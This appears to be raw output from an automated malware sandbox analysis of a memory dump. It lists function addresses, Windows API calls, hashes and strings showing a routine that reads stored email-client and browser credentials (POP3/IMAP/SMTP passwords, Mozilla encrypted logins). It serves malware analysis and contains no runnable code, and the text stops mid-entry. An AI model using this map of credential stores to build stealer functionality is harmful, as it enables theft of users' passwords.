                                                              • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                              • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID: (yE$(yE$(yE
                                                              • API String ID: 1865533344-362086290
                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                              APIs
                                                              • strlen.MSVCRT ref: 004431AD
                                                              • strncmp.MSVCRT ref: 004431BD
                                                              • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                              • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                              • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                              • API String ID: 1895597112-3210201812
                                                              • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                              • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                              • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                              • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                              • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                              • API String ID: 1714764973-479759155
                                                              • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                              • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                              • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                              • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040EBD8
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                              • memset.MSVCRT ref: 0040EC2B
                                                              • memset.MSVCRT ref: 0040EC47
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                              • memset.MSVCRT ref: 0040ECDD
                                                              • memset.MSVCRT ref: 0040ECF2
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                              • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                              • memset.MSVCRT ref: 0040EDE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                              • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                              • API String ID: 3137614212-1455797042
                                                              • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                              • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                              • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                              • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                              • API String ID: 2814039832-2206097438
                                                              • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                              • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                              • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                              • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                              APIs
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                              • memset.MSVCRT ref: 0040E5B8
                                                              • memset.MSVCRT ref: 0040E5CD
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                              • memset.MSVCRT ref: 0040E6B5
                                                              • memset.MSVCRT ref: 0040E6CC
                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                              • memset.MSVCRT ref: 0040E736
                                                              • memset.MSVCRT ref: 0040E74F
                                                              • sprintf.MSVCRT ref: 0040E76D
                                                              • sprintf.MSVCRT ref: 0040E788
                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                              • memset.MSVCRT ref: 0040E858
                                                              • sprintf.MSVCRT ref: 0040E873
                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                              • API String ID: 4171719235-3943159138
                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                              • GetDC.USER32 ref: 004104E2
                                                              • strlen.MSVCRT ref: 00410522
                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                              • sprintf.MSVCRT ref: 00410640
                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                              APIs
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,67E97B60,?,00000000), ref: 00402533
                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$QueryValuememset
                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 168965057-606283353
                                                              • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                              • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                              APIs
                                                              • memset.MSVCRT ref: 00402869
                                                                • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                              • _mbscpy.MSVCRT(?,?,67E97B60,?,00000000), ref: 004028A3
                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67E97B60,?,00000000), ref: 0040297B
                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                              • API String ID: 1497257669-167382505
                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 0040FC88
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                              • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                              • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                              • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                              • memset.MSVCRT ref: 0040FCFD
                                                              • memset.MSVCRT ref: 0040FD1D
                                                              • memset.MSVCRT ref: 0040FD3B
                                                              • memset.MSVCRT ref: 0040FD54
                                                              • memset.MSVCRT ref: 0040FD72
                                                              • memset.MSVCRT ref: 0040FD8B
                                                              • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                              • memset.MSVCRT ref: 0040FE45
                                                              • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                              • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                              • sprintf.MSVCRT ref: 0040FF0F
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                              • SetFocus.USER32(00000000), ref: 0040FF39
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                              • {Unknown}, xrefs: 0040FD02
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                              • API String ID: 1428123949-3474136107
                                                              • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                              • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                              • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                              • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                              • memset.MSVCRT ref: 0040128E
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                              • String ID:
                                                              • API String ID: 2998058495-0
                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                              APIs
                                                                • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                              • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                              • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                              • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                              • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                              • _strcmpi.MSVCRT ref: 0040BE93
                                                              • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                              • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                              • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                              • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                              • strlen.MSVCRT ref: 0040BEFE
                                                              • strlen.MSVCRT ref: 0040BF0C
                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                              • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                              • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                              • memset.MSVCRT ref: 0040BFDB
                                                              • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                              • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                              • API String ID: 2303586283-933021314
                                                              • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                              • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                              • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                              • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                              APIs
                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                              • API String ID: 231171946-2189169393
                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 633282248-1996832678
                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
